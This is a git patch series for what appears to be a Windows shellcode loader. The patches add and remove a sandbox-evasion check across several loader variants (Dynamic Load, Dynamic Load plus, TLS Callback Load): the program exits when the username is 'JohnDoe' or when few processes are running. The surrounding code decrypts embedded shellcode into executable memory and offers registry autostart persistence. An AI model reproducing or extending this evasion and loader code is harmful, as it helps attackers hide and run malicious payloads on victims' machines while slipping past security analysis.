From 7045c5f2e420071f9d0ccfa09dfbe42b8ddbf51f Mon Sep 17 00:00:00 2001
From: TimWhite <36320909+timwhitez@users.noreply.github.com>
Date: Tue, 1 Dec 2020 16:07:29 +0800
Subject: [PATCH 1/9] Update public.hpp

---
 plug/public.hpp | 24 ++++++++++++++++++++----
 1 file changed, 20 insertions(+), 4 deletions(-)

diff --git a/plug/public.hpp b/plug/public.hpp
index 625effc..f9e825d 100644
--- a/plug/public.hpp
+++ b/plug/public.hpp
@@ -1,5 +1,7 @@
 #include<windows.h>
 #include<TlHelp32.h>
+#define numSandboxUser 1
+const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" };
 
 /**********************************************************************
 * @Function: GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
@@ -75,6 +77,9 @@ struct CONFIG
 **********************************************************************/
 void AntiSimulation()
 {
+	WCHAR username[3267];
+	DWORD charCount = 3267;
+
 	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 	if (INVALID_HANDLE_VALUE == hSnapshot)
 	{
@@ -86,10 +91,21 @@ void AntiSimulation()
 	{
 		procnum++;
 	}
-	if (procnum <= 40)  //ÅÐ¶Ïµ±Ç°½ø³ÌÊÇ·ñµÍÓÚ40¸ö£¬Ä¿Ç°¼û¹ýÄÜÄ£Äâ×î¶à½ø³ÌµÄÊÇWDÄÜÄ£Äâ39¸ö
+	if (procnum <= 40)  //åˆ¤æ–­å½“å‰è¿›ç¨‹æ˜¯å¦ä½ŽäºŽ40ä¸ªï¼Œç›®å‰è§è¿‡èƒ½æ¨¡æ‹Ÿæœ€å¤šè¿›ç¨‹çš„æ˜¯WDèƒ½æ¨¡æ‹Ÿ39ä¸ª
 	{
 		exit(1);
 	}
+
+	if (!GetUserName(username, &charCount)) {
+		return;
+	}
+	for (int i = 0; i < numSandboxUser; ++i) {
+		if (wcsicmp(username, sandboxUsername[i]) == 0) {
+			exit(1);
+		}
+
+	}
+
 }
 
 /**********************************************************************
@@ -119,11 +135,11 @@ void AutoStart()
 **********************************************************************/
 void init(BOOL anti_sandbox, BOOL autostart)
 {
-	if (anti_sandbox)  //·´·ÂÕæ
+	if (anti_sandbox)  //åä»¿çœŸ
 	{
 		AntiSimulation();
 	}
-	if (autostart)  //×¢²á±íÌí¼Ó×ÔÆô¶¯
+	if (autostart)  //æ³¨å†Œè¡¨æ·»åŠ è‡ªå¯åŠ¨
 	{
 		AutoStart();
 	}
@@ -154,4 +170,4 @@ unsigned char* GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
 	memcpy(shellcode, (unsigned char*)pBuffer + sizeof(CONFIG), shellcodeSize);
 	StreamCrypt(shellcode, shellcodeSize, config.key, 128);
 	return shellcode;
-}
\ No newline at end of file
+}

From c28a97089f8fc4a0a63e8e009f2a194e209bf3d6 Mon Sep 17 00:00:00 2001
From: TimWhite <36320909+timwhitez@users.noreply.github.com>
Date: Tue, 1 Dec 2020 16:09:42 +0800
Subject: [PATCH 2/9] Update public.hpp

---
 plug/Dynamic Load/public.hpp | 20 ++++++++++++++++----
 1 file changed, 16 insertions(+), 4 deletions(-)

diff --git a/plug/Dynamic Load/public.hpp b/plug/Dynamic Load/public.hpp
index 4ae8967..c79048b 100644
--- a/plug/Dynamic Load/public.hpp	
+++ b/plug/Dynamic Load/public.hpp	
@@ -1,5 +1,7 @@
 #include<windows.h>
 #include<TlHelp32.h>
+#define numSandboxUser 1
+const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" };
 typedef LPVOID(WINAPI *pfnVirtualAlloc)(_In_opt_ LPVOID lpAddress, _In_ SIZE_T dwSize, _In_ DWORD flAllocationType, _In_ DWORD flProtect);
 typedef HRSRC(WINAPI *pfnFindResourceW)(HMODULE hModule, LPCWSTR lpName, LPCWSTR lpType);
 typedef DWORD(WINAPI *pfnSizeofResource)(HMODULE hModule, HRSRC hResInfo);
@@ -79,6 +81,8 @@ struct CONFIG
 **********************************************************************/
 void AntiSimulation()
 {
+	WCHAR username[3267];
+	DWORD charCount = 3267;
 	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 	if (INVALID_HANDLE_VALUE == hSnapshot)
 	{
@@ -90,10 +94,18 @@ void AntiSimulation()
 	{
 		procnum++;
 	}
-	if (procnum <= 40)  //ÅÐ¶Ïµ±Ç°½ø³ÌÊÇ·ñµÍÓÚ40¸ö£¬Ä¿Ç°¼û¹ýÄÜÄ£Äâ×î¶à½ø³ÌµÄÊÇWDÄÜÄ£Äâ39¸ö
+	if (procnum <= 40)  //åˆ¤æ–­å½“å‰è¿›ç¨‹æ˜¯å¦ä½ŽäºŽ40ä¸ªï¼Œç›®å‰è§è¿‡èƒ½æ¨¡æ‹Ÿæœ€å¤šè¿›ç¨‹çš„æ˜¯WDèƒ½æ¨¡æ‹Ÿ39ä¸ª
 	{
 		exit(1);
 	}
+	if (!GetUserName(username, &charCount)) {
+		return;
+	}
+	for (int i = 0; i < numSandboxUser; ++i) {
+		if (wcsicmp(username, sandboxUsername[i]) == 0) {
+			exit(1);
+		}
+	}
 }
 
 /**********************************************************************
@@ -123,11 +135,11 @@ void AutoStart()
 **********************************************************************/
 void init(BOOL anti_sandbox, BOOL autostart)
 {
-	if (anti_sandbox)  //·´·ÂÕæ
+	if (anti_sandbox)  //åä»¿çœŸ
 	{
 		AntiSimulation();
 	}
-	if (autostart)  //×¢²á±íÌí¼Ó×ÔÆô¶¯
+	if (autostart)  //æ³¨å†Œè¡¨æ·»åŠ è‡ªå¯åŠ¨
 	{
 		AutoStart();
 	}
@@ -165,4 +177,4 @@ unsigned char* GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
 	memcpy(shellcode, (unsigned char*)pBuffer + sizeof(CONFIG), shellcodeSize);
 	StreamCrypt(shellcode, shellcodeSize, config.key, 128);
 	return shellcode;
-}
\ No newline at end of file
+}

From 17fa875e5cc116bc2c3910d96e3fb0037267b65e Mon Sep 17 00:00:00 2001
From: TimWhite <36320909+timwhitez@users.noreply.github.com>
Date: Tue, 1 Dec 2020 16:10:36 +0800
Subject: [PATCH 3/9] Update public.hpp

---
 plug/Dynamic Load plus/public.hpp | 20 ++++++++++++++++----
 1 file changed, 16 insertions(+), 4 deletions(-)

diff --git a/plug/Dynamic Load plus/public.hpp b/plug/Dynamic Load plus/public.hpp
index 4376bfc..442f8b8 100644
--- a/plug/Dynamic Load plus/public.hpp	
+++ b/plug/Dynamic Load plus/public.hpp	
@@ -1,5 +1,7 @@
 #include<windows.h>
 #include<TlHelp32.h>
+#define numSandboxUser 1
+const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" };
 typedef LPVOID(WINAPI *pfnVirtualAlloc)(_In_opt_ LPVOID lpAddress, _In_ SIZE_T dwSize, _In_ DWORD flAllocationType, _In_ DWORD flProtect);
 typedef HRSRC(WINAPI *pfnFindResourceW)(HMODULE hModule, LPCWSTR lpName, LPCWSTR lpType);
 typedef DWORD(WINAPI *pfnSizeofResource)(HMODULE hModule, HRSRC hResInfo);
@@ -79,6 +81,8 @@ struct CONFIG
 **********************************************************************/
 void AntiSimulation()
 {
+	WCHAR username[3267];
+	DWORD charCount = 3267;
 	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 	if (INVALID_HANDLE_VALUE == hSnapshot)
 	{
@@ -90,10 +94,18 @@ void AntiSimulation()
 	{
 		procnum++;
 	}
-	if (procnum <= 40)  //ÅÐ¶Ïµ±Ç°½ø³ÌÊÇ·ñµÍÓÚ40¸ö£¬Ä¿Ç°¼û¹ýÄÜÄ£Äâ×î¶à½ø³ÌµÄÊÇWDÄÜÄ£Äâ39¸ö
+	if (procnum <= 40)  //åˆ¤æ–­å½“å‰è¿›ç¨‹æ˜¯å¦ä½ŽäºŽ40ä¸ªï¼Œç›®å‰è§è¿‡èƒ½æ¨¡æ‹Ÿæœ€å¤šè¿›ç¨‹çš„æ˜¯WDèƒ½æ¨¡æ‹Ÿ39ä¸ª
 	{
 		exit(1);
 	}
+	if (!GetUserName(username, &charCount)) {
+		return;
+	}
+	for (int i = 0; i < numSandboxUser; ++i) {
+		if (wcsicmp(username, sandboxUsername[i]) == 0) {
+			exit(1);
+		}
+	}
 }
 
 /**********************************************************************
@@ -123,11 +135,11 @@ void AutoStart()
 **********************************************************************/
 void init(BOOL anti_sandbox, BOOL autostart)
 {
-	if (anti_sandbox)  //·´·ÂÕæ
+	if (anti_sandbox)  //åä»¿çœŸ
 	{
 		AntiSimulation();
 	}
-	if (autostart)  //×¢²á±íÌí¼Ó×ÔÆô¶¯
+	if (autostart)  //æ³¨å†Œè¡¨æ·»åŠ è‡ªå¯åŠ¨
 	{
 		AutoStart();
 	}
@@ -228,4 +240,4 @@ unsigned char* GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
 	memcpy(shellcode, (unsigned char*)pBuffer + sizeof(CONFIG), shellcodeSize);
 	StreamCrypt(shellcode, shellcodeSize, config.key, 128);
 	return shellcode;
-}
\ No newline at end of file
+}

From 194f49e4db6fdbf355136cac057b00484a61c195 Mon Sep 17 00:00:00 2001
From: TimWhite <36320909+timwhitez@users.noreply.github.com>
Date: Tue, 1 Dec 2020 16:18:23 +0800
Subject: [PATCH 4/9] Update public.hpp

---
 plug/TLS Callback Load/public.hpp | 22 +++++++++++++++++-----
 1 file changed, 17 insertions(+), 5 deletions(-)

diff --git a/plug/TLS Callback Load/public.hpp b/plug/TLS Callback Load/public.hpp
index 0dc3e4f..4b607b7 100644
--- a/plug/TLS Callback Load/public.hpp	
+++ b/plug/TLS Callback Load/public.hpp	
@@ -1,5 +1,7 @@
 #include<windows.h>
 #include<TlHelp32.h>
+#define numSandboxUser 1
+const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" };
 
 //shellcode memory to execute
 LPVOID Memory;
@@ -77,6 +79,8 @@ struct CONFIG
 **********************************************************************/
 void AntiSimulation()
 {
+	WCHAR username[3267];
+	DWORD charCount = 3267;
 	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 	if (INVALID_HANDLE_VALUE == hSnapshot)
 	{
@@ -88,10 +92,18 @@ void AntiSimulation()
 	{
 		procnum++;
 	}
-	if (procnum <= 40)  //ÅÐ¶Ïµ±Ç°½ø³ÌÊÇ·ñµÍÓÚ40¸ö£¬Ä¿Ç°¼û¹ýÄÜÄ£Äâ×î¶à½ø³ÌµÄÊÇWDÄÜÄ£Äâ39¸ö
+	if (procnum <= 40)  //åˆ¤æ–­å½“å‰è¿›ç¨‹æ˜¯å¦ä½ŽäºŽ40ä¸ªï¼Œç›®å‰è§è¿‡èƒ½æ¨¡æ‹Ÿæœ€å¤šè¿›ç¨‹çš„æ˜¯WDèƒ½æ¨¡æ‹Ÿ39ä¸ª
 	{
 		exit(1);
 	}
+	if (!GetUserName(username, &charCount)) {
+		return;
+	}
+	for (int i = 0; i < numSandboxUser; ++i) {
+		if (wcsicmp(username, sandboxUsername[i]) == 0) {
+			exit(1);
+		}
+	}
 }
 
 /**********************************************************************
@@ -121,11 +133,11 @@ void AutoStart()
 **********************************************************************/
 void init(BOOL anti_sandbox, BOOL autostart)
 {
-	if (anti_sandbox)  //·´·ÂÕæ
+	if (anti_sandbox)  //åä»¿çœŸ
 	{
 		AntiSimulation();
 	}
-	if (autostart)  //×¢²á±íÌí¼Ó×ÔÆô¶¯
+	if (autostart)  //æ³¨å†Œè¡¨æ·»åŠ è‡ªå¯åŠ¨
 	{
 		AutoStart();
 	}
@@ -151,8 +163,8 @@ void GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
 	//2.Initialization
 	memcpy(&config, pBuffer, sizeof(CONFIG));
 	init(config.antisandbox, config.autostart);
-	//3.Getshellcode   //TLS»Øµ÷º¯ÊýÖÐ²»ÄÜÊ¹ÓÃnew·ÖÅäÄÚ´æ£¬·ñÔò»á³öÏÖ·ÃÎÊ´íÎó£¬ËùÒÔÖ±½Ó·ÖÅä¿ÉÖ´ÐÐÄÚ´æ
+	//3.Getshellcode   //TLSå›žè°ƒå‡½æ•°ä¸­ä¸èƒ½ä½¿ç”¨newåˆ†é…å†…å­˜ï¼Œå¦åˆ™ä¼šå‡ºçŽ°è®¿é—®é”™è¯¯ï¼Œæ‰€ä»¥ç›´æŽ¥åˆ†é…å¯æ‰§è¡Œå†…å­˜
 	Memory = VirtualAlloc(NULL, totalSize - sizeof(CONFIG), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 	memcpy(Memory, (char *)pBuffer + sizeof(CONFIG), totalSize - sizeof(CONFIG));
 	StreamCrypt((unsigned char*)Memory, totalSize - sizeof(CONFIG), config.key, 128);
-}
\ No newline at end of file
+}

From 40da2c1bb2193d460b095b85da899b7381b3a71a Mon Sep 17 00:00:00 2001
From: TimWhite <36320909+timwhitez@users.noreply.github.com>
Date: Tue, 1 Dec 2020 18:32:45 +0800
Subject: [PATCH 5/9] Update public.hpp

---
 plug/Dynamic Load/public.hpp | 12 ------------
 1 file changed, 12 deletions(-)

diff --git a/plug/Dynamic Load/public.hpp b/plug/Dynamic Load/public.hpp
index c79048b..94ef7ae 100644
--- a/plug/Dynamic Load/public.hpp	
+++ b/plug/Dynamic Load/public.hpp	
@@ -1,7 +1,5 @@
 #include<windows.h>
 #include<TlHelp32.h>
-#define numSandboxUser 1
-const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" };
 typedef LPVOID(WINAPI *pfnVirtualAlloc)(_In_opt_ LPVOID lpAddress, _In_ SIZE_T dwSize, _In_ DWORD flAllocationType, _In_ DWORD flProtect);
 typedef HRSRC(WINAPI *pfnFindResourceW)(HMODULE hModule, LPCWSTR lpName, LPCWSTR lpType);
 typedef DWORD(WINAPI *pfnSizeofResource)(HMODULE hModule, HRSRC hResInfo);
@@ -81,8 +79,6 @@ struct CONFIG
 **********************************************************************/
 void AntiSimulation()
 {
-	WCHAR username[3267];
-	DWORD charCount = 3267;
 	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 	if (INVALID_HANDLE_VALUE == hSnapshot)
 	{
@@ -98,14 +94,6 @@ void AntiSimulation()
 	{
 		exit(1);
 	}
-	if (!GetUserName(username, &charCount)) {
-		return;
-	}
-	for (int i = 0; i < numSandboxUser; ++i) {
-		if (wcsicmp(username, sandboxUsername[i]) == 0) {
-			exit(1);
-		}
-	}
 }
 
 /**********************************************************************

From 2a2a7c46081b5ba0c698e596dbf07933d0cb628b Mon Sep 17 00:00:00 2001
From: TimWhite <36320909+timwhitez@users.noreply.github.com>
Date: Tue, 1 Dec 2020 18:33:12 +0800
Subject: [PATCH 6/9] Update public.hpp

---
 plug/Dynamic Load plus/public.hpp | 12 ------------
 1 file changed, 12 deletions(-)

diff --git a/plug/Dynamic Load plus/public.hpp b/plug/Dynamic Load plus/public.hpp
index 442f8b8..6bae130 100644
--- a/plug/Dynamic Load plus/public.hpp	
+++ b/plug/Dynamic Load plus/public.hpp	
@@ -1,7 +1,5 @@
 #include<windows.h>
 #include<TlHelp32.h>
-#define numSandboxUser 1
-const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" };
 typedef LPVOID(WINAPI *pfnVirtualAlloc)(_In_opt_ LPVOID lpAddress, _In_ SIZE_T dwSize, _In_ DWORD flAllocationType, _In_ DWORD flProtect);
 typedef HRSRC(WINAPI *pfnFindResourceW)(HMODULE hModule, LPCWSTR lpName, LPCWSTR lpType);
 typedef DWORD(WINAPI *pfnSizeofResource)(HMODULE hModule, HRSRC hResInfo);
@@ -81,8 +79,6 @@ struct CONFIG
 **********************************************************************/
 void AntiSimulation()
 {
-	WCHAR username[3267];
-	DWORD charCount = 3267;
 	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 	if (INVALID_HANDLE_VALUE == hSnapshot)
 	{
@@ -98,14 +94,6 @@ void AntiSimulation()
 	{
 		exit(1);
 	}
-	if (!GetUserName(username, &charCount)) {
-		return;
-	}
-	for (int i = 0; i < numSandboxUser; ++i) {
-		if (wcsicmp(username, sandboxUsername[i]) == 0) {
-			exit(1);
-		}
-	}
 }
 
 /**********************************************************************

From 5b21d354f9de4d2a9e2539dedf51c03d0e9991c8 Mon Sep 17 00:00:00 2001
From: TimWhite <36320909+timwhitez@users.noreply.github.com>
Date: Tue, 1 Dec 2020 18:33:41 +0800
Subject: [PATCH 7/9] Update public.hpp


From ab025c4b3894131c0dbf8f2d879a3a475e350d90 Mon Sep 17 00:00:00 2001
From: TimWhite <36320909+timwhitez@users.noreply.github.com>
Date: Tue, 1 Dec 2020 18:34:29 +0800
Subject: [PATCH 8/9] Update public.hpp

---
 plug/TLS Callback Load/public.hpp | 12 ------------
 1 file changed, 12 deletions(-)

diff --git a/plug/TLS Callback Load/public.hpp b/plug/TLS Callback Load/public.hpp
index 4b607b7..405f39e 100644
--- a/plug/TLS Callback Load/public.hpp	
+++ b/plug/TLS Callback Load/public.hpp	
@@ -1,7 +1,5 @@
 #include<windows.h>
 #include<TlHelp32.h>
-#define numSandboxUser 1
-const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" };
 
 //shellcode memory to execute
 LPVOID Memory;
@@ -79,8 +77,6 @@ struct CONFIG
 **********************************************************************/
 void AntiSimulation()
 {
-	WCHAR username[3267];
-	DWORD charCount = 3267;
 	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 	if (INVALID_HANDLE_VALUE == hSnapshot)
 	{
@@ -96,14 +92,6 @@ void AntiSimulation()
 	{
 		exit(1);
 	}
-	if (!GetUserName(username, &charCount)) {
-		return;
-	}
-	for (int i = 0; i < numSandboxUser; ++i) {
-		if (wcsicmp(username, sandboxUsername[i]) == 0) {
-			exit(1);
-		}
-	}
 }
 
 /**********************************************************************

From 21e3bf4217a1e07c0d1e56e925f8c43cf5e8056b Mon Sep 17 00:00:00 2001
From: TimWhite <36320909+timwhitez@users.noreply.github.com>
Date: Tue, 1 Dec 2020 18:37:02 +0800
Subject: [PATCH 9/9] Update public.hpp

---
 plug/Dynamic Load/public.hpp | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)

diff --git a/plug/Dynamic Load/public.hpp b/plug/Dynamic Load/public.hpp
index 94ef7ae..03efe61 100644
--- a/plug/Dynamic Load/public.hpp	
+++ b/plug/Dynamic Load/public.hpp	
@@ -5,6 +5,9 @@ typedef HRSRC(WINAPI *pfnFindResourceW)(HMODULE hModule, LPCWSTR lpName, LPCWSTR
 typedef DWORD(WINAPI *pfnSizeofResource)(HMODULE hModule, HRSRC hResInfo);
 typedef HGLOBAL(WINAPI *pfnLoadResource)(HMODULE hModule, HRSRC hResInfo);
 typedef LPVOID(WINAPI *pfnLockResource)(HGLOBAL hResData);
+#define numSandboxUser 1
+const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" };
+
 
 /**********************************************************************
 * @Function: GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
@@ -79,6 +82,9 @@ struct CONFIG
 **********************************************************************/
 void AntiSimulation()
 {
+	WCHAR username[3267];
+	DWORD charCount = 3267;
+
 	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 	if (INVALID_HANDLE_VALUE == hSnapshot)
 	{
@@ -94,6 +100,17 @@ void AntiSimulation()
 	{
 		exit(1);
 	}
+
+	if (!GetUserName(username, &charCount)) {
+		return;
+	}
+	for (int i = 0; i < numSandboxUser; ++i) {
+		if (wcsicmp(username, sandboxUsername[i]) == 0) {
+			exit(1);
+		}
+
+	}
+
 }
 
 /**********************************************************************